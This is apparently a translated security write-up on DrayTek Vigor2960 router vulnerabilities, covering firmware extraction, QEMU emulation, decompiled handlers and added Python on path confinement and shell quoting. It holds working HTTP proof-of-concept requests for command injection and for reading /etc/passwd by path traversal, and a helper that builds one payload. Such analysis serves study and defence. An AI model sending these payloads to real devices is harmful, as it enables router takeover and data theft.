The vulnerability advisory describes the device as MIPS, so an emulated system could be built with QEMU's system mode. In practice, however, the executables under bin in the extracted image are ARM little-endian ELF files, so once you have a shell and start uploading tools, mind the platform's binary format.
I tried to set up the environment, but failed.
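Before uploading anything to a shell on the device, it is worth checking the binaries' real architecture rather than trusting the advisory. The Python below is an added example, not code from the original post: it reads the ELF identification bytes plus e_type/e_machine from each file and reports class, endianness and machine. The two sample headers are hand-constructed test inputs, not bytes from the Vigor2960 image, and the default directory name ubifs-root is taken from the extraction step below.

```python
import os
import struct

# e_machine values from the ELF specification for the architectures that matter here.
EM_NAMES = {0x03: "x86", 0x08: "MIPS", 0x28: "ARM", 0x3E: "x86-64", 0xB7: "AArch64"}
ET_NAMES = {1: "REL", 2: "EXEC", 3: "DYN"}


def elf_platform(header):
    """Parse the first 20 bytes of an ELF file: e_ident plus e_type and e_machine.

    Raises ValueError for anything that is not a well-formed ELF header.
    """
    if len(header) < 20 or header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    bits = {1: 32, 2: 64}.get(header[4])             # EI_CLASS
    endian = {1: "little", 2: "big"}.get(header[5])  # EI_DATA
    if bits is None or endian is None:
        raise ValueError("bad EI_CLASS/EI_DATA")
    # e_type and e_machine follow the 16-byte e_ident, in the file's own byte order.
    fmt = ("<" if endian == "little" else ">") + "HH"
    e_type, e_machine = struct.unpack(fmt, header[16:20])
    return {
        "bits": bits,
        "endian": endian,
        "machine": EM_NAMES.get(e_machine, hex(e_machine)),
        "type": ET_NAMES.get(e_type, str(e_type)),
    }


def describe(header):
    """One-line summary of an ELF header, or None when the bytes are not ELF."""
    try:
        p = elf_platform(header)
    except ValueError:
        return None
    return "%s %d-bit %s-endian %s" % (p["machine"], p["bits"], p["endian"], p["type"])


def summarize(files):
    """Map {path: leading bytes} to {path: summary}; runs without a filesystem."""
    return {path: describe(data) for path, data in files.items()}


def scan_dir(root):
    """Walk an extracted rootfs (e.g. ubifs-root) and summarise every ELF found."""
    found = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            with open(path, "rb") as fh:
                summary = describe(fh.read(20))
            if summary is not None:
                found[path] = summary
    return found


# Constructed sample headers (not taken from the firmware): an ARM little-endian
# executable and a MIPS big-endian executable. 4 magic + 3 ident + 9 padding = 16 bytes.
ARM_LE_SAMPLE = b"\x7fELF\x01\x01\x01" + b"\x00" * 9 + struct.pack("<HH", 2, 0x28)
MIPS_BE_SAMPLE = b"\x7fELF\x01\x02\x01" + b"\x00" * 9 + struct.pack(">HH", 2, 0x08)

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "ubifs-root"
    for path, summary in sorted(scan_dir(root).items()):
        print(path, summary)
```

Run it against the extracted root filesystem; if the bin directory reports ARM 32-bit little-endian, a MIPS toolchain and MIPS static binaries are the wrong things to upload.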
The firmware is packed as a UBI image.
`ubireader_extract_images Vigor2960_v1.4.1.all`
unpacks and dumps the UBI volume images;
`ubireader_extract_files Vigor2960_v1.4.1.all`
unpacks and extracts the files (the root filesystem lands under ubifs-root/).
```bash
# Configure the network: create a bridge
sudo apt-get install bridge-utils
sudo brctl addbr Virbr0
sudo ifconfig Virbr0 192.168.10.1/24 up
# Create a tap interface and add it to the bridge
sudo apt install uml-utilities
sudo tunctl -t tap0
sudo ifconfig tap0 192.168.10.11/24 up
sudo brctl addif Virbr0 tap0
# Boot an ARM Debian guest with the tap as its NIC
sudo qemu-system-arm -M vexpress-a9 \
  -kernel vmlinuz-3.2.0-4-vexpress \
  -initrd initrd.img-3.2.0-4-vexpress \
  -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 \
  -append "root=/dev/mmcblk0p2" \
  -net nic -net tap,ifname=tap0,script=no,downscript=no \
  -nographic
# Inside the guest: assign an address and test connectivity to the host
ifconfig eth0 192.168.10.2/24 up
ping 192.168.10.1 -c 10
# Back on the host: copy the extracted ubifs-root folder into the guest
scp -r ubifs-root/ root@192.168.10.2:~/
# Inside the guest: bind-mount dev and proc, then chroot into the firmware rootfs
ssh root@192.168.10.2
mount -o bind /dev ./ubifs-root/dev
mount -o bind /proc ./ubifs-root/proc
chroot ubifs-root /bin/sh
```
After that the web service started successfully, but I could not find the script that starts the whole VPN stack; having only the HTTP service up is of no use.
```http
POST /cgi-bin/mainfunction.cgi HTTP/1.1
Host: 192.168.1.1
Content-Length: 57
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: SESSION_ID_VIGOR=
Connection: close

action=commandTable&command=14&parameter=`touch test.txt`
```
v1.5.1.4
Following the PoC, look up the handler for that action directly.
The value is written into the v6 buffer and concatenated onto /tmp/ without any sanitisation of the string, which gives arbitrary file read.
sub_11B88 writes configuration into keyword_object.cfg; we never enter that loop, so it is of little interest.
https://github.com/xxy1126/Vuln/blob/main/Draytek/1.md
```http
POST /cgi-bin/mainfunction.cgi HTTP/1.1
Host: xxxxxxxx
Content-Length: 61
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: xxxxxxxx
Referer: xxxxxxxxxx
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: SESSION_ID_VIGOR=7:26EB81E4EA6DC603661320EBD1C938DC
Connection: close

action=doCfgExport&option=/../etc/passwd-&rtick=1663484341535
```
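To make the doCfgExport file read concrete, here is an added example in Python (not code from the post, and not DrayTek's firmware) that mirrors the handler as the post describes it: the option value is concatenated onto /tmp/ with no checks, so a leading /.. walks out of the directory. A hardened version normalises the joined path and refuses anything that does not stay under the export directory. The /tmp/ base comes from the post; the export directory constant and the sample option values are assumptions for illustration.

```python
import posixpath

EXPORT_DIR = "/tmp"  # the post says the option value is joined onto /tmp/


def vulnerable_export_path(option):
    """Straight concatenation, as the post describes the handler: no checks at all."""
    return "/tmp/" + option


def resolved(path):
    """Lexically resolve '.', '..' and doubled slashes, which is what the kernel's path
    walk does with these components, so the demo needs no real files."""
    return posixpath.normpath(path)


def confined_export_path(option):
    """Return the normalised path inside EXPORT_DIR, or None if the option escapes it."""
    if "\x00" in option:  # an embedded NUL would truncate the C string later on
        return None
    # Strip leading slashes so an absolute option cannot replace the base outright,
    # then normalise and check the prefix on the *result*, not on the raw input.
    candidate = posixpath.normpath(posixpath.join(EXPORT_DIR, option.lstrip("/")))
    if candidate.startswith(EXPORT_DIR + "/"):
        return candidate
    return None


def is_confined(option):
    return confined_export_path(option) is not None


if __name__ == "__main__":
    # Constructed inputs: a legitimate export name and two traversal attempts.
    for opt in ("backup.cfg", "/../etc/passwd-", "a/../../etc/shadow"):
        print("%-20s vulnerable -> %-18s confined -> %s" % (
            opt, resolved(vulnerable_export_path(opt)), confined_export_path(opt)))
```

The prefix check is lexical; a symlink planted inside /tmp would still lead elsewhere, so a real fix additionally resolves the path with realpath once the file exists and re-checks the prefix, or opens relative to a directory descriptor with symlink following disabled.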
version<1.5.1
https://cn-sec.com/archives/1423548.html
https://www.secpulse.com/archives/166775.html
Decompile main and locate the function that handles the action parameter.
Follow into sub_B3E0.
Compare against the table at off_41408.
After the check function passes, v40 is concatenated into the openssl command string.
popen then executes that command.
https://github.com/imjdl/CVE-2020-8515-PoC
version<1.5.1.1
https://nosec.org/home/detail/4631.html
https://bestwing.me/drayteck-vigor-vulnerability-disclosure.html
On version 1.5.1, when the path cgi-bin/mainfunction.cgi/cvmcfgupload is requested with a Content-Type of text/x-python-script, the filename field is subject to command injection.
Follow into sub_12F24.
The trigger point, where the command string is concatenated, is as follows:
```http
POST /cgi-bin/mainfunction.cgi/cvmcfgupload?1=2 HTTP/1.1
Host: xxx.xxx.xxx.xxx:xxxx
Content-Length: 174
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en;q=0.9,zh-CN;q=0.8,la;q=0.7
Connection: close

------WebKitFormBoundary
Content-Disposition: form-data; name="abc"; filename="t';id;echo '1_"
Content-Type: text/x-python-script

------WebKitFormBoundary--
```
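The command injections on this page (the parameter that reaches popen through the openssl string, the backtick in the commandTable PoC, and the filename in the cvmcfgupload upload) are one bug: untrusted text spliced into a shell command line. The Python below is an added example, not code from the post or from the firmware. It assembles the multipart body of the PoC above with an arbitrary filename, then shows why `t';id;echo '1_` works against a single-quoted splice and a backtick works against a bare one, and what quoting the whole argument with shlex.quote does to both. The two command templates are hypothetical stand-ins; the post shows the injection points but not the exact command strings.

```python
import shlex

BOUNDARY = "----WebKitFormBoundary"


def build_cvmcfgupload_body(filename, field="abc", content=b""):
    """Multipart body shaped like the PoC above; only the filename and the optional file
    content vary. Send it as a POST to /cgi-bin/mainfunction.cgi/cvmcfgupload with
    Content-Type: multipart/form-data; boundary=BOUNDARY."""
    head = "\r\n".join([
        "--" + BOUNDARY,
        'Content-Disposition: form-data; name="%s"; filename="%s"' % (field, filename),
        "Content-Type: text/x-python-script",
        "",
        "",
    ]).encode()
    return head + content + ("\r\n--" + BOUNDARY + "--\r\n").encode()


# HYPOTHETICAL command templates. The post shows where input is concatenated (a filename
# inside single quotes; a parameter reaching popen via the openssl string) but not the
# exact command lines, so these stand in for them.
QUOTED_TEMPLATE = "cp '{}' /tmp/cfg/"                   # input lands inside '...'
UNQUOTED_TEMPLATE = "openssl enc -in {} -out /tmp/out"  # input lands bare


def vulnerable_command(template, value):
    """What string concatenation into popen() produces."""
    return template.format(value)


def hardened_command(template, value):
    """Quote the whole argument exactly once with shlex.quote. The template's own quotes
    are dropped first: hand-written quotes are precisely what gets broken out of."""
    return template.replace("'{}'", "{}").format(shlex.quote(value))


def sh_tokens(cmd):
    """Tokenise roughly as /bin/sh would: quotes honoured, ; & | ( ) split out."""
    return list(shlex.shlex(cmd, posix=True, punctuation_chars=True))


def shell_command_count(cmd):
    """1 means the line is still a single command; more means the input broke out."""
    return 1 + sum(1 for t in sh_tokens(cmd) if t in (";", "&", "&&", "|", "||"))


def argument_survives(cmd, value):
    """True when the untrusted value reaches the program as exactly one argv entry."""
    return value in sh_tokens(cmd)


if __name__ == "__main__":
    fn = "t';id;echo '1_"  # the filename from the PoC above
    print(build_cvmcfgupload_body(fn).decode())
    cases = ((QUOTED_TEMPLATE, "/tmp/upload/" + fn), (UNQUOTED_TEMPLATE, "`touch test.txt`"))
    for tmpl, val in cases:
        for label, render in (("vulnerable", vulnerable_command), ("hardened", hardened_command)):
            cmd = render(tmpl, val)
            print("%-10s commands=%d arg intact=%-5s %s" % (
                label, shell_command_count(cmd), argument_survives(cmd, val), cmd))
```

argument_survives is the check that matters: a backtick does not add a `;` separator, so counting commands alone would miss the commandTable-style payload, but in the vulnerable unquoted form the value is shredded into several tokens instead of arriving as one argument. Not going through a shell at all (an argv list to exec) is the stronger fix; shlex.quote is the minimum when the popen call has to stay.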
https://github.com/peanuts62/bug_poc
DrayTek Vigor2960 1.5.1.2
- END -